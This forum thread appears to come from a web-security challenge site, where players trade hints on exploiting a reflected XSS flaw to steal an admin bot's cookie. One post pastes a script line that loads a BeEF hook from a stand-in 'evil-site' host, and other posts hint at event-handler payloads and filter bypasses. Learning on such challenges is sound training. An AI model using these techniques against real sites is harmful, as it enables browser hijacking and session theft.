Web - Client

hi. i am a bit stuck
so i have discovered place where i can use event handlers , i can get alert box, but only interaction events are working like onclick

but what would be the way to get the cookie? a hint ?

tnx

The bot has the same behavior as a human. Have you test all the event ? https://www.w3schools.com/tags/ref_eventattributes.asp :)

even though i will find the event, and if we talk that bot is human alike, i cannot use script tag, and still need to send location to my server, how would i achieve that in the tag ?
do i have to use BEEF ?

Xss is not only <script>alert(1)</script>. There is multiple way to exploit xss. And why do you want to use Beef ? Do you know what Beef is doing ? Are you really sure it could be usefull here ?

bcs the only place i have found its the tag space and several even handlers, so i cannot use SCRIPT word
and need to send location

have found this script over the net

var s = document.createElement(’script’); s.src=’http://evil-site/beef/hook/beefmagic.js.php’;document.getElementsByTagName(’head’)[0].appendChild(s);
Beef can hook a brower and extract a cookie, but that didnt work for me..

how can i send cookie in other way in the tag space ?

Stop copy/paste anything you found on internet. You must understand what you are doing ! There is several ressources on internet about XSS. Juste google it

i have read a lot...
but within the tag its different , if i were to have img tag so its easy , using src, but its different , or i miss something ? in what xss direction should i read ?

i can understad whats happens in scrpt above, its the creation of object with script allowed, bypassing xss filter on the server, and then loading beef js hook, that can give control over a browser

No I think you don’t read a lot. First link in google = owasp guide. Its the first thing you have to read. Why it’s not done ?
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)

Hi Th1b4ud , i detected " a tag xss " , and i try to "onmouseover" but bot dont’ request cookies ... anything hint for me

I think you are on the good way. Always check your source code after submit your payload. You have to bypass some filters ;)

thanks Th1 , i think i did anything i know , i used to expoloit on "error page" and success . Whene i reported admin , however bot don’t request :(

i have reflected xss for myself, but how to force an admin to it...?
i have found an html event, bypassed " filter
but there is one more filter if i want to use the xss for the admin....
i need a (hero) hint pls

tnx

I don’t know if there’s something wrong with the bot or not but I’ve tried the same events multiple times (onfocus, mouseover, etc) to no avail. I eventually ended up getting it, but I think part of the reason are the js functions I was using. It seems like whatever browser they use is extremely out of date (considering that the XSS auditor has been introduced and deprecated recently which would have prevented my attack) so I’d also recommend sticking to the traditional javascript syntax dating back to as early as possible. Also onfocus didn’t work for me (even with the forced focus) but the same request with a different event did (so try not to waste time on that even though you know it’s correct).